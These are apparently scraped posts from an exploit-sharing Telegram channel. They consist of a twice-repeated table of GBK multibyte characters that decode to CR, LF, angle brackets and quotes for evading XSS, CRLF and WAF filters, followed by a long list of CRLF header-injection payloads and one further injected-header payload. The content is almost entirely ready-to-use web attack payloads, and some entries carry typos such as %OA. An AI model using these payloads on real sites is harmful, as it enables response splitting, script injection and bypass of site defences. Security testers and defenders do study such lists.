GBK Encoding / MultiByte Attack
嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")
For XSS, CRLF, WAF bypass
#bypass #xss #crlf
——————
0Day.Today
@LearnExploit
@Tech_Army
嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")
For XSS, CRLF, WAF bypass
#bypass #xss #crlf
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5
CRLF Injection Payloads
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
%0AHeader-Test:Bug
%0A%20Header-Test:Bug
%20%0AHeader-Test:Bug
%23%OAHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0AHeader-Test:Bug
%3F%0AHeader-Test:Bug
crlf%0AHeader-Test:Bug
crlf%0A%20Header-Test:Bug
crlf%20%0AHeader-Test:Bug
crlf%23%OAHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:Bug
crlf%3F%0AHeader-Test:Bug
%0DHeader-Test:Bug
%0D%20Header-Test:Bug
%20%0DHeader-Test:Bug
%23%0DHeader-Test:Bug
%23%0AHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0DHeader-Test:Bug
%3F%0DHeader-Test:Bug
crlf%0DHeader-Test:Bug
crlf%0D%20Header-Test:Bug
crlf%20%0DHeader-Test:Bug
crlf%23%0DHeader-Test:Bug
crlf%23%0AHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:Bug
crlf%3F%0DHeader-Test:Bug
%0D%0AHeader-Test:Bug
%0D%0A%20Header-Test:Bug
%20%0D%0AHeader-Test:Bug
%23%0D%0AHeader-Test:Bug
\r\nHeader-Test:Bug
\r\n Header-Test:Bug
\r\n Header-Test:Bug
%5cr%5cnHeader-Test:Bug
%E5%98%8A%E5%98%8DHeader-Test:Bug
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug
%3F%0D%0AHeader-Test:Bug
crlf%0D%0AHeader-Test:Bug
crlf%0D%0A%20Header-Test:Bug
crlf%20%0D%0AHeader-Test:Bug
crlf%23%0D%0AHeader-Test:Bug
crlf\r\nHeader-Test:Bug
crlf%5cr%5cnHeader-Test:Bug
crlf%E5%98%8A%E5%98%8DHeader-Test:Bug
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug
crlf%3F%0D%0AHeader-Test:Bug
%0D%0A%09Header-Test:Bug
crlf%0D%0A%09Header-Test:Bug
%250AHeader-Test:Bug
%25250AHeader-Test:Bug
%%0A0AHeader-Test:Bug
%25%30AHeader-Test:Bug
%25%30%61Header-Test:Bug
%u000AHeader-Test:Bug
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:Bug
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:Bug
/google.com/%2F..%0D%0AHeader-Test:Bug
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4👍3⚡1
CRLF Injection Payload
payload :
#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload :
%0D%0ASomeCustomInjectedHeader:%20injected_by_fffffff#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1